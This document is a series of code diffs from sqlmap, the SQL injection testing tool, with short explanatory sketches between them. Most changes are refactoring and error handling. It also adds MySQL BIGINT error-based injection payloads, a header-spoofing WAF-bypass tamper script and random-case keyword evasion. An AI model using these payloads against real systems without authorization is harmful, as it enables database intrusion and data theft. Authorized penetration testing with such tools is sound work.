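column = "total (USD"  # hypothetical identifier containing a regex metacharacter

try:
    re.search(r"(.+\.)?%s" % column, "t.total (USD")
except re.error as ex:
    print("unescaped pattern is rejected: %s" % ex)

# re.escape() turns every metacharacter into a literal, so the search succeeds.
print(bool(re.search(r"(.+\.)?%s" % re.escape(column), "t.total (USD")))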
@@ -14,6 +14,7 @@ from lib.core.common import isNoneValue
 from lib.core.common import isNumPosStrValue
 from lib.core.common import isTechniqueAvailable
 from lib.core.common import safeSQLIdentificatorNaming
+from lib.core.common import unArrayizeValue
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb

@@ -49,6 +50,8 @@ class Enumeration(GenericEnumeration):
             users = kb.data.cachedUsers

         for user in users:
+            user = unArrayizeValue(user)
+
             if user is None:
                 continue
@@ -5,6 +5,7 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import os
 import re

 from lib.core.agent import agent

@@ -78,10 +79,10 @@ class Takeover(GenericTakeover):
         self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)

         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll")
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so")
             self.udfSharedLibExt = "so"

     def udfCreateFromSharedLib(self, udf, inpRet):
@@ -5,6 +5,8 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """

+import os
+
 from lib.core.common import Backend
 from lib.core.common import randomStr
 from lib.core.data import kb

@@ -58,10 +60,10 @@ class Takeover(GenericTakeover):
             raise SqlmapUnsupportedFeatureException(errMsg)

         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll")
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so")
             self.udfSharedLibExt = "so"

     def udfCreateFromSharedLib(self, udf, inpRet):
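The MySQL and PostgreSQL takeover hunks above build the local UDF path with os.path.join() instead of appending '/'-separated fragments, so the path uses the separator of the platform sqlmap itself runs on. A small sketch of the idea, with placeholder values standing in for self.udfLocalFile and Backend.getArch():

import os

base_path = os.path.join("data", "udf")  # stand-in for self.udfLocalFile
arch = 64                                # stand-in for Backend.getArch()

# os.path.join picks "\\" on Windows and "/" elsewhere, so the same code
# yields a valid local path on either platform.
udf_local_file = os.path.join(base_path, "mysql", "windows", "%d" % arch, "lib_mysqludf_sys.dll")
print(udf_local_file)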
@@ -6,12 +6,13 @@ See the file 'doc/COPYING' for copying permission
 """

 import re
+import sys

 from lib.core.common import Backend
 from lib.core.common import dataToStdout
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
-from lib.core.convert import utf8decode
 from lib.core.data import conf
 from lib.core.data import logger
 from lib.core.dicts import SQL_STATEMENTS

@@ -81,7 +82,7 @@ class Custom:

             try:
                 query = raw_input("sql-shell> ")
-                query = utf8decode(query)
+                query = getUnicode(query, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
                 print
                 errMsg = "user aborted"
@@ -147,7 +147,7 @@ class Entries:
                 for column in colList:
                     _ = agent.preprocessField(tbl, column)
                     if _ != column:
-                        colString = re.sub(r"\b%s\b" % column, _, colString)
+                        colString = re.sub(r"\b%s\b" % re.escape(column), _, colString)

                 entriesCount = 0

@@ -337,12 +337,17 @@ class Entries:
                     kb.data.dumpedTable["__infos__"] = {"count": entriesCount,
                                                         "table": safeSQLIdentificatorNaming(tbl, True),
                                                         "db": safeSQLIdentificatorNaming(conf.db)}
-                    attackDumpedTable()
+                    try:
+                        attackDumpedTable()
+                    except (IOError, OSError), ex:
+                        errMsg = "an error occurred while attacking "
+                        errMsg += "table dump ('%s')" % ex
+                        logger.critical(errMsg)
                     conf.dumper.dbTableValues(kb.data.dumpedTable)

-            except SqlmapConnectionException, e:
-                errMsg = "connection exception detected in dumping phase: "
-                errMsg += "'%s'" % e
+            except SqlmapConnectionException, ex:
+                errMsg = "connection exception detected in dumping phase "
+                errMsg += "('%s')" % ex
                 logger.critical(errMsg)

             finally:
@@ -261,7 +261,7 @@ class Search:
                     if tblConsider == "2":
                         continue
                 else:
-                    for db in conf.db.split(","):
+                    for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                         db = safeSQLIdentificatorNaming(db)
                         if db not in foundTbls:
                             foundTbls[db] = []

@@ -501,7 +501,7 @@ class Search:
                         if db not in foundCols[column]:
                             foundCols[column][db] = []
                 else:
-                    for db in conf.db.split(","):
+                    for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),):
                         db = safeSQLIdentificatorNaming(db)
                         if db not in foundCols[column]:
                             foundCols[column][db] = []
@@ -101,7 +101,9 @@ class Users:
             values = inject.getValue(query, blind=False, time=False)

             if not isNoneValue(values):
-                kb.data.cachedUsers = arrayizeValue(values)
+                kb.data.cachedUsers = []
+                for value in arrayizeValue(values):
+                    kb.data.cachedUsers.append(unArrayizeValue(value))

         if not kb.data.cachedUsers and isInferenceAvailable() and not conf.direct:
             infoMsg = "fetching number of database users"
sqlmap.conf (21 changed lines)
@@ -40,31 +40,34 @@ sitemapUrl =
 # These options can be used to specify how to connect to the target URL.
 [Request]

+# Force usage of given HTTP method (e.g. PUT).
+method =
+
 # Data string to be sent through POST.
 data =

-# Character used for splitting parameter values
+# Character used for splitting parameter values.
 paramDel =

 # HTTP Cookie header value.
 cookie =

-# Character used for splitting cookie values
+# Character used for splitting cookie values.
 cookieDel =

-# File containing cookies in Netscape/wget format
+# File containing cookies in Netscape/wget format.
 loadCookies =

-# Ignore Set-Cookie header from response
+# Ignore Set-Cookie header from response.
 # Valid: True or False
 dropSetCookie = False

 # HTTP User-Agent header value. Useful to fake the HTTP User-Agent header value
-# at each HTTP request
+# at each HTTP request.
 # sqlmap will also test for SQL injection on the HTTP User-Agent value.
 agent =

-# Use randomly selected HTTP User-Agent header value
+# Use randomly selected HTTP User-Agent header value.
 # Valid: True or False
 randomAgent = False

@@ -158,6 +161,12 @@ saFreq = 0
 # Valid: True or False
 skipUrlEncode = False

+# Parameter used to hold anti-CSRF token
+csrfToken =
+
+# URL address to visit to extract anti-CSRF token
+csrfUrl =
+
 # Force usage of SSL/HTTPS
 # Valid: True or False
 forceSSL = False
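sqlmap.conf is plain INI syntax, so the options added above can also be inspected with the standard library parser. A minimal sketch (Python 2, matching the codebase; this is independent of sqlmap's own configuration loader):

import ConfigParser

parser = ConfigParser.RawConfigParser()
parser.read("sqlmap.conf")

# The two anti-CSRF options introduced above; empty values mean "unset".
csrf_token = parser.get("Request", "csrfToken")
csrf_url = parser.get("Request", "csrfUrl")
print("csrfToken=%r, csrfUrl=%r" % (csrf_token, csrf_url))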
sqlmap.py (21 changed lines)
@@ -9,6 +9,7 @@ import bdb
 import inspect
 import logging
+import os
 import re
 import sys
 import time
 import traceback

@@ -21,8 +22,10 @@ from lib.utils import versioncheck # this has to be the first non-standard impo
 from lib.controller.controller import start
 from lib.core.common import banner
+from lib.core.common import createGithubIssue
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
+from lib.core.common import maskSensitiveData
 from lib.core.common import setColor
 from lib.core.common import setPaths
 from lib.core.common import weAreFrozen
@@ -127,9 +130,22 @@ def main():
     except:
         print
         errMsg = unhandledExceptionMessage()
+        excMsg = traceback.format_exc()
+
+        for match in re.finditer(r'File "(.+?)", line', excMsg):
+            file_ = match.group(1)
+            file_ = os.path.relpath(file_, os.path.dirname(__file__))
+            file_ = file_.replace("\\", '/')
+            file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
+            excMsg = excMsg.replace(match.group(1), file_)
+
+        errMsg = maskSensitiveData(errMsg)
+        excMsg = maskSensitiveData(excMsg)
+
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL
-        dataToStdout(setColor(traceback.format_exc()))
+        dataToStdout(excMsg)
+        createGithubIssue(errMsg, excMsg)

     finally:
         if conf.get("showTime"):

@@ -156,6 +172,9 @@ def main():
     except KeyboardInterrupt:
         pass

+    if conf.get("dumper"):
+        conf.dumper.flush()
+
     # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program
     if conf.get("threads", 0) > 1 or conf.get("dnsServer"):
         os._exit(0)
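The main() hunk above rewrites the paths inside the captured traceback to repository-relative, forward-slash form and masks sensitive data before the text is printed and attached to an automatically created GitHub issue, so local directory names stay out of the report. A standalone sketch of the path-normalization step, applied to a fabricated traceback line:

import os
import re

exc_msg = 'File "/home/someuser/tools/sqlmap/lib/core/common.py", line 42, in getUnicode'
base = "/home/someuser/tools/sqlmap"  # stand-in for os.path.dirname(__file__)

for match in re.finditer(r'File "(.+?)", line', exc_msg):
    file_ = os.path.relpath(match.group(1), base)
    file_ = file_.replace("\\", "/")
    exc_msg = exc_msg.replace(match.group(1), file_)

print(exc_msg)  # File "lib/core/common.py", line 42, in getUnicode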
@@ -44,10 +44,14 @@ def tamper(payload, **kwargs):
             word = match.group()

             if word.upper() in kb.keywords:
-                _ = str()
+                while True:
+                    _ = ""

-                for i in xrange(len(word)):
-                    _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+                    for i in xrange(len(word)):
+                        _ += word[i].upper() if randomRange(0, 1) else word[i].lower()
+
+                    if len(_) > 1 and _ not in (_.lower(), _.upper()):
+                        break

                 retVal = retVal.replace(word, _)
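The loop added above keeps re-randomizing the keyword's letter cases until the result is genuinely mixed (neither all-lowercase nor all-uppercase), so a keyword can no longer come out of the tamper unchanged. A standalone sketch of the same idea, using the random module in place of sqlmap's randomRange() helper:

import random

def random_case(word):
    # Words that cannot be mixed-case are returned as-is (SQL keywords never hit this).
    if sum(c.isalpha() for c in word) < 2:
        return word
    # Retry until the result differs from both its lower- and upper-case forms,
    # mirroring the check added in the hunk above.
    while True:
        candidate = "".join(c.upper() if random.randint(0, 1) else c.lower() for c in word)
        if candidate not in (candidate.lower(), candidate.upper()):
            return candidate

print(random_case("SELECT"))  # e.g. "sElEcT"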
@@ -14,7 +14,7 @@ def dependencies():

 def tamper(payload, **kwargs):
     """
-    Append a HTTP Request Parameter to bypass
+    Append a HTTP header 'X-originating-IP' to bypass
     WAF Protection of Varnish Firewall

     Notes:
tamper/xforwardedfor.py (new file, 29 lines)
@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+from random import sample
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def randomIP():
+    numbers = []
+    while not numbers or numbers[0] in (10, 172, 192):
+        numbers = sample(xrange(1, 255), 4)
+    return '.'.join(str(_) for _ in numbers)
+
+def tamper(payload, **kwargs):
+    """
+    Append a fake HTTP header 'X-Forwarded-For' to bypass
+    WAF (usually application based) protection
+    """
+
+    headers = kwargs.get("headers", {})
+    headers["X-Forwarded-For"] = randomIP()
+    return payload
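The new tamper script above leaves the payload untouched and instead mutates the headers dictionary passed in through kwargs; randomIP() draws four distinct octets and re-rolls whenever the first octet would fall into a common private range. A short sketch of how such a tamper function is driven (the calling convention is inferred from the script itself, not taken from sqlmap's tamper loader):

from random import sample

def randomIP():
    numbers = []
    while not numbers or numbers[0] in (10, 172, 192):
        numbers = sample(range(1, 255), 4)
    return ".".join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    return payload

headers = {}
print(tamper("1 AND 1=1", headers=headers))  # payload comes back unchanged
print(headers)                               # e.g. {'X-Forwarded-For': '53.27.201.14'}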
thirdparty/ansistrm/ansistrm.py (vendored, 2 changed lines)
@@ -62,6 +62,8 @@ class ColorizingStreamHandler(logging.StreamHandler):
             self.flush()
         except (KeyboardInterrupt, SystemExit):
             raise
+        except IOError:
+            pass
         except:
             self.handleError(record)
@@ -23,9 +23,9 @@
     <dbms value="Microsoft SQL Server">
         <error regexp="Driver.* SQL[\-\_\ ]*Server"/>
         <error regexp="OLE DB.* SQL Server"/>
-        <error regexp="(\W|\A)SQL Server.*Driver"/>
+        <error regexp="\bSQL Server.*Driver"/>
         <error regexp="Warning.*mssql_.*"/>
-        <error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
+        <error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
         <error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
         <error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
     </dbms>

@@ -39,7 +39,7 @@

     <!-- Oracle -->
     <dbms value="Oracle">
-        <error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
+        <error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
        <error regexp="Oracle error"/>
        <error regexp="Oracle.*Driver"/>
        <error regexp="Warning.*\Woci_.*"/>
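The errors.xml changes above swap the (\W|\A) prefix for \b. Both variants refuse to match inside a longer word, but \b is a zero-width assertion, so the character before the DBMS banner is no longer swallowed into the match. A quick Python comparison on a typical Microsoft SQL Server error string:

import re

page = "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark"

for pattern in (r"(\W|\A)SQL Server.*Driver", r"\bSQL Server.*Driver"):
    match = re.search(pattern, page)
    print("%s -> %r" % (pattern, match.group(0)))

# Neither form fires when the banner is only part of a longer word.
print(re.search(r"\bSQL Server", "NoSQL Serverless backend"))  # None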
@@ -1252,6 +1252,26 @@ Formats:
        </details>
    </test>

+    <test>
+        <title>MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>>= 5.5</dbms_version>
+        </details>
+    </test>
+
    <test>
        <title>MySQL >= 4.1 AND error-based - WHERE or HAVING clause</title>
        <stype>2</stype>

@@ -1470,6 +1490,26 @@ Formats:
        </details>
    </test>

+    <test>
+        <title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>>= 5.5</dbms_version>
+        </details>
+    </test>
+
    <test>
        <title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause</title>
        <stype>2</stype>

@@ -1715,6 +1755,26 @@ Formats:
        </details>
    </test>

+    <test>
+        <title>MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>>= 5.5</dbms_version>
+        </details>
+    </test>
+
    <test>
        <title>PostgreSQL error-based - Parameter replace</title>
        <stype>2</stype>

@@ -1877,6 +1937,26 @@ Formats:
        </details>
    </test>

+    <test>
+        <title>MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>>= 5.5</dbms_version>
+        </details>
+    </test>
+
    <test>
        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
        <stype>2</stype>
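The four <test> entries added above use the BIGINT overflow error-based technique: the doubled constant pushes the expression out of MySQL's integer range, and the resulting out-of-range error message echoes the CONCAT()-wrapped query result between the two delimiter markers, which the <grep> expression then extracts. The bracketed placeholders are filled in at runtime; a rough standalone sketch of that templating and extraction step, with made-up delimiter strings rather than sqlmap's real ones:

import re

vector = ("AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),"
          "'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))")

# Hypothetical substitutions; the real values come from the current enumeration query.
payload = vector.replace("[QUERY]", "SELECT user()")
payload = payload.replace("[DELIMITER_START]", "qxqzq").replace("[DELIMITER_STOP]", "qkqvq")
print(payload)

# The <grep> expression pulls the echoed result back out of the DBMS error message.
error_page = "BIGINT UNSIGNED value is out of range in '2*if(... 'qxqzqroot@localhostqkqvqx' ...)'"
print(re.search(r"qxqzq(?P<result>.*?)qkqvq", error_page).group("result"))  # root@localhost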